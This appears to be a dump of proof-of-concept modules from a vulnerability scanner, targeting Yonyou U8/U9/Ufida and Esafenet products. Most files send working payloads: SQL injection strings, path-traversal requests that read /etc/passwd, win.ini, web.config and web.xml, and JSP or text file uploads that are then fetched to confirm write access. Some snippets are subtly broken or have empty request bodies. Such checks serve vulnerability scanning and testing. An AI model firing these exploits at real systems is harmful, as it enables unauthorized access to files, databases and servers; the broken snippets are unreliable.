/pocs/web/OA/yongyou/u8/yongyou_u8_runScript_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NCCloud系统runScript存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',
12 | 'Accept': '*/*',
13 | 'Accept-Encoding': 'gzip',
14 | 'Accept-Language': 'en',
15 | 'Authorization': '58e00466213416018d01d15de83b0198',
16 | 'Connection': 'close',
17 | 'Content-Type': 'application/x-www-form-urlencoded'
18 | }
19 | data = '''key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual'''
20 |
21 | vurl = urllib.parse.urljoin(url, "/ncchr/attendScript/internal/runScript")
22 | try:
23 | response = requests.post(vurl, headers=headers, data=data)
24 | if response.status_code == 200 and '12321' in response.text:
25 | relsult['vulnerable'] = True
26 | relsult['verify'] = vurl
27 | return relsult
28 |
29 | except:
30 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_upload_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_number
5 | def verify(url):
6 | relsult = {
7 | 'name': '',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | num = generate_random_number(6)
12 | headers = {
13 | 'User-Agent': 'Mozilla/5.0',
14 | 'Connection': 'close',
15 | 'Content-Type': 'application/x-www-form-urlencoded',
16 | 'filename': f'{num}.jsp',
17 | 'Accept-Encoding': 'gzip'
18 | }
19 | data = '''<% out.println("The website has vulnerabilities!!");%>'''
20 | vurl = urllib.parse.urljoin(url, "/linux/pages/upload.jsp")
21 | try:
22 | response = requests.post(vurl, headers=headers, data=data)
23 | if response.status_code == 200 and 'success' in response.text:
24 | vurl = url + f'/linux/{num.jsp}'
25 | response = requests.get(vurl)
26 | if response.status_code == 200 and 'vulnerabilities' in response.text:
27 | relsult['vulnerable'] = True
28 | relsult['verify'] = vurl
29 | return relsult
30 |
31 | except:
32 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_DoQuery_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_DoQuery_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_GetConnectionString_infoleak.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_GetConnectionString_infoleak.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_UMWebService_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u9/__pycache__/yongyou_u9_UMWebService_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/yongyou_u9_DoQuery_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U9系统DoQuery接口存在SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Content-Type': 'text/xml; charset=utf-8',
12 | 'SOAPAction': '"http://tempuri.org/GetEnterprise"'
13 | }
14 | data = '''
15 |
16 |
17 |
18 |
19 | '''
20 | vurl = urllib.parse.urljoin(url, "/U9C/CS/Office/TransWebService.asmx")
21 | try:
22 | response = requests.post(vurl, headers=headers, data=data)
23 | if response.status_code == 200 and 'Code' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u9/yongyou_u9_UMWebService_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友U9-UMWebService.asmx存在文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Content-Type': 'text/xml; charset=utf-8',
14 | 'SOAPAction': '"http://tempuri.org/GetLogContent"',
15 | 'Accept-Encoding': 'gzip'
16 | }
17 | data = '''
18 |
19 |
20 |
21 | ../web.config
22 |
23 |
24 | '''
25 | vurl = urllib.parse.urljoin(url, "/u9/OnLine/UMWebService.asmx")
26 | try:
27 | response = requests.post(vurl, headers=headers, data=data)
28 | if response.status_code == 200 and 'config' in response.text:
29 | relsult['vulnerable'] = True
30 | relsult['verify'] = vurl
31 | return relsult
32 |
33 | except:
34 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_ELTextFile_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_ELTextFile_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_getFileLocal_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_getFileLocal_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadApk_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadApk_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadIcon_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/ufida/__pycache__/yongyou_ufida_uploadIcon_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/yongyou_ufida_ELTextFile_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友Ufida-ELTextFile.load.d任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0',
12 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
13 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Connection': 'close'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/hrss/ELTextFile.load.d?src=WEB-INF/web.xml")
18 | try:
19 | response = requests.post(vurl, headers=headers)
20 | if response.status_code == 200 and 'web-app' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/yongyou_ufida_getFileLocal_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友移动系统管理getFileLocal接口存在任意文件读取',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Upgrade-Insecure-Requests': '1',
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
14 | 'Accept-Encoding': 'gzip, deflate, br',
15 | 'Accept-Language': 'zh-CN,zh;q=0.9',
16 | 'Cookie': 'JSESSIONID=B9F1AC8D34E9DFD16A3A7A4B9CEE4EF9.server',
17 | 'Connection': 'close'
18 | }
19 | vurl = urllib.parse.urljoin(url, "/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml")
20 | try:
21 | response = requests.get(vurl, headers=headers)
22 | if response.status_code == 200 and 'version=' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/ufida/yongyou_ufida_uploadApk_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友移动系统管理uploadApk接口存在任意文件上传',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Accept': '*/*',
14 | 'Connection': 'close',
15 | 'Content-Type': 'application/x-www-form-urlencoded',
16 | }
17 | data = '''--fa48ebfef59b133a8cd5275661b35d2c
18 | Content-Disposition: form-data; name="downloadpath"; filename="5921209.jsp"
19 | Content-Type: application/msword
20 |
21 | 082863327
22 | --fa48ebfef59b133a8cd5275661b35d2c--'''
23 | vurl = urllib.parse.urljoin(url, "/maportal/appmanager/uploadApk.dopk_obj=")
24 | try:
25 | response = requests.post(vurl, headers=headers, data=data)
26 | if response.status_code == 200:
27 | response = requests.get(url+'/maupload/apk/5921209.jsp')
28 | if response.status_code == 200 and '082863327' in response.text:
29 | relsult['vulnerable'] = True
30 | relsult['verify'] = vurl
31 | return relsult
32 |
33 | except:
34 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/yongyou_government_affairs_FileDownload_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友政务财务系统FileDownload存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Connection': 'keep-alive',
12 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
13 | 'X-Requested-With': 'XMLHttpRequest',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
15 | 'Accept-Encoding': 'gzip, deflate, br, zstd',
16 | 'Accept-Language': 'zh-CN,zh;q=0.9'
17 | }
18 | vurl1 = urllib.parse.urljoin(url, "/bg/attach/FileDownload?execlPath=/etc/passwd")
19 | vurl2 = urllib.parse.urljoin(url, "/bg/attach/FileDownload?execlPath=C://Windows//win.ini")
20 | try:
21 | response = requests.get(vurl1, headers=headers)
22 | if response.status_code == 200 and 'root' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl1
25 | return relsult
26 | response = requests.get(vurl2, headers=headers)
27 | if response.status_code == 200 and '[fonts]' in response.text:
28 | relsult['vulnerable'] = True
29 | relsult['verify'] = vurl2
30 | return relsult
31 |
32 |
33 | except:
34 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/yongyou_u9_PatchFile_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友-U9-PatchFile.asmx任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Content-Type': 'text/xml; charset=utf-8',
14 | 'Content-Length': '421'
15 | }
16 | data = '''
17 |
18 |
19 |
20 | dGVzdDEyMw==
21 | ./
22 | 69123.txt
23 |
24 |
25 | '''
26 | vurl = urllib.parse.urljoin(url, "/CS/Office/AutoUpdates/PatchFile.asmx")
27 | try:
28 | response = requests.post(vurl, headers=headers, data=data)
29 | if response.status_code == 200:
30 | response = requests.get(url+'/CS/Office/AutoUpdates/69123.txt')
31 | if response.status_code == 200 and 'test123' in response.text:
32 | relsult['vulnerable'] = True
33 | relsult['verify'] = url+'/CS/Office/AutoUpdates/69123.txt'
34 | return relsult
35 |
36 | except:
37 | return relsult
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_CDGAuthoriseTempletService1_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_CDGAuthoriseTempletService1_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_DecryptApplication_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_DecryptApplication_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_DecryptionApp_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_DecryptionApp_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_UploadFileManagerService_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_UploadFileManagerService_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/__pycache__/esafenet_dataimport_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/esafenet/__pycache__/esafenet_dataimport_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/esafenet/esafenet_CDGAuthoriseTempletService1_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
12 | "Content-Type": "application/xml"
13 | }
14 | data = "CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDJAFOOFLNONAODEHAOEOGNEODKCOMDHBCFNPABIFOJJMOAABAPPFOFKBJMFFECMPBEEABGMMHLFAMKELPIEKDIOLJBAEFJHFMGNCLFOHPGKMOALGNKIPEDBEANAIMMLHKFLFOMIAFFCNHGBBDOCBDIONABHPKGCFFFOGCFKGPFAEAFCFJGHFEFOGOCB"
15 | vurl = urllib.parse.urljoin(url, "/CDGServer3/CDGAuthoriseTempletService1")
16 | try:
17 | response = requests.post(vurl, headers=headers, data=data, verify=False)
18 | if response.status_code == 200 and 'FEPCCC' in response.text and 'MEOGCAKA' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/esafenet/esafenet_DecryptApplication_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and '[fonts]' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/esafenet/esafenet_UploadFileManagerService_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | data = '''command=ViewUploadFile&filePath=c:/windows/win.ini&fileName1=111111'''
15 | vurl = urllib.parse.urljoin(url, "/CDGServer3/document/UploadFileManagerService;login")
16 | try:
17 | response = requests.post(vurl, headers=headers, data=data)
18 | if response.status_code == 200 and '[fonts]' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | urllib3~=1.26.9
2 | requests~=2.28.1
3 | mmh3~=4.0.1
4 | dnslib~=0.9.24
5 | rich~=13.7.1
6 | chardet~=5.0.0
7 | bs4~=0.0.1
8 | beautifulsoup4~=4.11.2
9 | colorama~=0.4.4
--------------------------------------------------------------------------------